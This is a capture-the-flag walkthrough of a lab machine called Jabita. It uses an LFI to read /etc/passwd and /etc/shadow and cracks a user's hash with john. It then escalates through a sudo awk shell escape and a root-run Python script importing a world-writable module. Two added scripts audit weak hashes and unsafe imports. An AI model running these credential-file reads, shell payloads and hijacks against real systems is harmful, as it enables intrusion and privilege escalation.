This machine was created by Rijaba1

Port recognition with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon jabita.hmvm

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-17 12:31 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 12:31
Completed NSE at 12:31, 0.00s elapsed
Initiating ARP Ping Scan at 12:31
Scanning jabita.hmvm (10.0.2.13) [1 port]
Completed ARP Ping Scan at 12:31, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 12:31
Scanning jabita.hmvm (10.0.2.13) [65535 ports]
Discovered open port 80/tcp on 10.0.2.13
Discovered open port 22/tcp on 10.0.2.13
Completed SYN Stealth Scan at 12:31, 1.57s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.13.
Initiating NSE at 12:31
Completed NSE at 12:31, 0.00s elapsed
Nmap scan report for jabita.hmvm (10.0.2.13)
Host is up (0.000058s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:29:A4:75 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 12:31
Completed NSE at 12:31, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.81 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [Server info]
http://jabita.hmvm:80 [200 OK] Apache[2.4.52], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.52 (Ubuntu)], IP[10.0.2.13]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Sep 17 12:31:58 2022
URL_BASE: http://jabita.hmvm:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://jabita.hmvm:80/ ----
+ http://jabita.hmvm:80/index.html (CODE:200|SIZE:62)
+ http://jabita.hmvm:80/server-status (CODE:403|SIZE:276)

-----------------
END_TIME: Sat Sep 17 12:31:59 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports two open ports: 22 (SSH) and 80 (HTTP).

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -t 500 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://jabita.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://jabita.hmvm/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload
=====================================================================

000000001:   200        1 L      5 W        62 Ch       "# directory-list-2.3-medium.txt"
000000003:   200        1 L      5 W        62 Ch       "# Copyright 2007 James Fisher"
000000004:   200        1 L      5 W        62 Ch       "#"
000000007:   200        1 L      5 W        62 Ch       "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"
000000010:   200        1 L      5 W        62 Ch       "#"
000000012:   200        1 L      5 W        62 Ch       "# on atleast 2 different hosts"
000000002:   200        1 L      5 W        62 Ch       "#"
000000005:   200        1 L      5 W        62 Ch       "# This work is licensed under the Creative Commons"
000000008:   200        1 L      5 W        62 Ch       "# or send a letter to Creative Commons, 171 Second Street,"
000000006:   200        1 L      5 W        62 Ch       "# Attribution-Share Alike 3.0 License. To view a copy of this"
000000009:   200        1 L      5 W        62 Ch       "# Suite 300, San Francisco, California, 94105, USA."
000000013:   200        1 L      5 W        62 Ch       "#"
000000014:   200        1 L      5 W        62 Ch       "http://jabita.hmvm/"
000000011:   200        1 L      5 W        62 Ch       "# Priority ordered case sensative list, where entries were found"
000002398:   301        9 L      28 W       313 Ch      "building"
000045240:   200        1 L      5 W        62 Ch       "http://jabita.hmvm/"
000095524:   403        9 L      28 W       276 Ch      "server-status"

Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0

More fuzzing turned up a building folder. Looking inside it, we found a possible local file inclusion (LFI) in the page parameter of index.php.

┌──(root@ghost)-[/home/ghost]
└─# lfienum "http://jabita.hmvm/building/index.php?page=" | sed -e 's/Home\|Gallery\|Contact//g'
lfiǝnum ~by 0bfxgh0st*

[http://jabita.hmvm/building/index.php?page=/etc/passwd]

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
syslog:x:107:113::/home/syslog:/usr/sbin/nologin
uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
jack:x:1001:1001::/home/jack:/bin/bash
jaba:x:1002:1002::/home/jaba:/bin/bash

[http://jabita.hmvm/building/index.php?page=/etc/shadow]

root:$y$j9T$avXO7BCR5/iCNmeaGmMSZ0$gD9m7w9/zzi1iC9XoaomnTHTp0vde7smQL1eYJ1V3u1:19240:0:99999:7:::
daemon:*:19213:0:99999:7:::
bin:*:19213:0:99999:7:::
sys:*:19213:0:99999:7:::
sync:*:19213:0:99999:7:::
games:*:19213:0:99999:7:::
man:*:19213:0:99999:7:::
lp:*:19213:0:99999:7:::
mail:*:19213:0:99999:7:::
news:*:19213:0:99999:7:::
uucp:*:19213:0:99999:7:::
proxy:*:19213:0:99999:7:::
www-data:*:19213:0:99999:7:::
backup:*:19213:0:99999:7:::
list:*:19213:0:99999:7:::
irc:*:19213:0:99999:7:::
gnats:*:19213:0:99999:7:::
nobody:*:19213:0:99999:7:::
_apt:*:19213:0:99999:7:::
systemd-network:*:19213:0:99999:7:::
systemd-resolve:*:19213:0:99999:7:::
messagebus:*:19213:0:99999:7:::
systemd-timesync:*:19213:0:99999:7:::
pollinate:*:19213:0:99999:7:::
sshd:*:19213:0:99999:7:::
syslog:*:19213:0:99999:7:::
uuidd:*:19213:0:99999:7:::
tcpdump:*:19213:0:99999:7:::
tss:*:19213:0:99999:7:::
landscape:*:19213:0:99999:7:::
usbmux:*:19236:0:99999:7:::
lxd:!:19236::::::
jack:$6$xyz$FU1GrBztUeX8krU/94RECrFbyaXNqU8VMUh3YThGCAGhlPqYCQryXBln3q2J2vggsYcTrvuDPTGsPJEpn/7U.0:19236:0:99999:7:::
jaba:$y$j9T$pWlo6WbJDbnYz6qZlM87d.$CGQnSEL8aHLlBY/4Il6jFieCPzj7wk54P8K4j/xhi/1:19240:0:99999:7:::

...

We can read /etc/shadow, which contains the password hashes. We save jack's sha512crypt ($6$) hash to a file named hashes and crack it with john and rockyou.

┌──(root@ghost)-[/home/ghost]
└─# john --wordlist=rockyou.txt hashes
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
joaninha         (jack)     
1g 0:00:00:01 DONE (2022-09-17 12:52) 0.5025g/s 1929p/s 1929c/s 1929C/s minerva..dodgers
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
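An added audit script (not part of the original write-up) that parses shadow entries in the format dumped above and flags what made jack's hash the quick win: it reads the crypt(3) scheme from the $id$ prefix, pulls out salt and rounds, and reports weak schemes, short salts, default rounds and empty password fields. The sample entries are constructed with placeholder hash material; only the salts mirror the dump.

```python
# crypt(3) prefixes as emitted by glibc/libxcrypt on the Ubuntu box above.
SCHEMES = {"y": "yescrypt", "7": "scrypt", "6": "sha512crypt",
           "5": "sha256crypt", "1": "md5crypt"}
WEAK_SCHEMES = {"md5crypt", "descrypt", "unknown"}

# Constructed sample in the shape of the dump above. Salts are kept as on the
# page; the hash material is a placeholder, not the machine's real values.
SAMPLE = """\
root:$y$j9T$avXO7BCR5/iCNmeaGmMSZ0$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLD:19240:0:99999:7:::
daemon:*:19213:0:99999:7:::
lxd:!:19236::::::
jack:$6$xyz$PLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEHOLDERPLACEH:19236:0:99999:7:::
"""

def parse_hash(field):
    """Return (scheme, salt, rounds) for one crypt(3) password field."""
    parts = field.split("$")          # "$6$xyz$..." -> ["", "6", "xyz", "..."]
    if len(parts) < 4 or parts[0] != "":
        return ("descrypt" if len(field) == 13 else "unknown"), "", None
    scheme = SCHEMES.get(parts[1], "unknown")
    rest = parts[2:]
    if scheme in ("yescrypt", "scrypt"):
        return scheme, rest[1], None     # rest[0] is the encoded cost (j9T)
    if rest[0].startswith("rounds="):
        return scheme, rest[1], int(rest[0][len("rounds="):])
    rounds = 5000 if scheme in ("sha512crypt", "sha256crypt") else None
    return scheme, rest[0], rounds       # no rounds= field: glibc default

def audit_shadow(text):
    """Map each account to its findings; locked accounts get an empty list."""
    findings = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        user, field = line.split(":")[:2]
        issues = []
        if field == "":
            issues.append("empty password field: login needs no password")
        elif not field.startswith(("*", "!")):        # otherwise locked
            scheme, salt, rounds = parse_hash(field)
            if scheme in WEAK_SCHEMES:
                issues.append(f"weak or unknown scheme: {scheme}")
            if scheme in ("sha512crypt", "sha256crypt", "md5crypt") and len(salt) < 8:
                issues.append(f"short salt ({len(salt)} chars) for {scheme}")
            if rounds == 5000:
                issues.append("default rounds=5000: cheap to run a wordlist against")
        findings[user] = issues
    return findings
```

Running audit_shadow over a real shadow dump is a quick way to spot the one account whose hash will fall to a wordlist in seconds, as jack's did here.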

We obtained jack's password (joaninha), so we can log in over SSH.

┌──(root@ghost)-[/home/ghost]
└─# ssh jack@jabita.hmvm
The authenticity of host 'jabita.hmvm (10.0.2.13)' can't be established.
ED25519 key fingerprint is SHA256:Sxz30elYyqNibTrCsnd7Xa6CrZ6qllyKNc+LfOMtZSo.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jabita.hmvm' (ED25519) to the list of known hosts.
jack@jabita.hmvm's password: 
Welcome to Ubuntu 22.04.1 LTS (GNU/Linux 5.15.0-47-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Sep 17 04:55:47 PM UTC 2022

  System load:  0.0               Processes:               114
  Usage of /:   52.9% of 9.75GB   Users logged in:         0
  Memory usage: 30%               IPv4 address for enp0s3: 10.0.2.13
  Swap usage:   0%


6 updates can be applied immediately.
3 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Sep  5 12:01:58 2022 from 192.163.0.90
jack@jabita:~$ sudo -l
Matching Defaults entries for jack on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

User jack may run the following commands on jabita:
    (jaba : jaba) NOPASSWD: /usr/bin/awk

As we can see, jack can run /usr/bin/awk as user jaba through sudo without a password.

┌──(root@ghost)-[/home/ghost]
└─# gtfobins.py awk
...

[Sudo]
If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.


sudo awk 'BEGIN {system("/bin/sh")}'

...
jack@jabita:~$ sudo -u jaba awk 'BEGIN {system("/bin/bash")}'
jaba@jabita:/home/jack$ cd ../jaba
jaba@jabita:~$ cat user.txt
2e0942811f4k3f146c1be613cbc7a39

Time to elevate our privileges from jaba to root

jaba@jabita:~$ sudo -l
Matching Defaults entries for jaba on jabita:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, listpw=never

User jaba may run the following commands on jabita:
    (root) NOPASSWD: /usr/bin/python3 /usr/bin/clean.py

jaba@jabita:~$ sudo -u root /usr/bin/python3 /usr/bin/clean.py
Hello
jaba@jabita:~$ cat /usr/bin/clean.py
import wild

wild.first()
jaba@jabita:~$ find / wild.py 2>/dev/null | grep wild.py
/usr/lib/python3.10/wild.py
jaba@jabita:~$ cat /usr/lib/python3.10/wild.py
def first():
        print("Hello")

jaba@jabita:~$ ls -la /usr/lib/python3.10/wild.py
-rw-r--rw- 1 root root 29 Sep  5 12:48 /usr/lib/python3.10/wild.py

Python library hijacking: clean.py runs as root and does `import wild`, and /usr/lib/python3.10/wild.py is world-writable (-rw-r--rw-), so whatever we write into wild.py executes as root.

jaba@jabita:~$ nano /usr/lib/python3.10/wild.py
jaba@jabita:~$ cat /usr/lib/python3.10/wild.py
import os
os.system('/bin/bash')
jaba@jabita:~$ sudo -u root /usr/bin/python3 /usr/bin/clean.py
root@jabita:/home/jaba# cat /root/root.txt
f4bb4cced0f4k3f1466fc77af70d3fe
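An added check (not the machine's or the author's code) that resolves a module the way `import wild` does and refuses to load it when its file or containing directory is group- or world-writable, the condition clean.py never verified before importing. demo() rebuilds the layout in a temporary directory with a constructed wild.py set to mode 646; module_risks and import_checked are names of my own.

```python
import importlib.util
import os
import stat
import sys
import tempfile

# Write bits that let someone other than the owner replace module code.
UNSAFE_BITS = stat.S_IWGRP | stat.S_IWOTH

def module_risks(name):
    """Resolve `name` as `import name` would and list why it could be hijacked.
    Both the file and its directory are checked: a writable directory lets an
    attacker drop a replacement even when the existing file is read-only."""
    spec = importlib.util.find_spec(name)
    if spec is None or not spec.has_location or not spec.origin:
        return []                      # built-in or frozen: nothing on disk
    risks = []
    for label, path in (("module", spec.origin),
                        ("directory", os.path.dirname(spec.origin))):
        mode = os.stat(path).st_mode
        if mode & UNSAFE_BITS:
            risks.append(f"{label} {path} is group/world-writable "
                         f"({stat.filemode(mode)})")
    return risks

def import_checked(name):
    """Import `name` only if nobody but its owner can alter what gets loaded."""
    risks = module_risks(name)
    if risks:
        raise ImportError(f"refusing to import {name}: " + "; ".join(risks))
    return importlib.import_module(name)

def demo():
    """Constructed reproduction of the box's layout: a wild.py with mode 646."""
    d = tempfile.mkdtemp()             # mode 700, so the directory itself passes
    mod = os.path.join(d, "wild.py")
    with open(mod, "w") as f:
        f.write('def first():\n    print("Hello")\n')
    os.chmod(mod, 0o646)               # -rw-r--rw-, as in the ls -la above
    sys.path.insert(0, d)              # where sudo python3 /usr/bin/clean.py looks
    try:
        try:
            import_checked("wild")
            refused = False
        except ImportError:
            refused = True
        return {"risks": module_risks("wild"), "refused": refused}
    finally:
        sys.path.remove(d)
```

The same function run against every name a root-owned sudo script imports is a cheap way to catch this misconfiguration before someone else does.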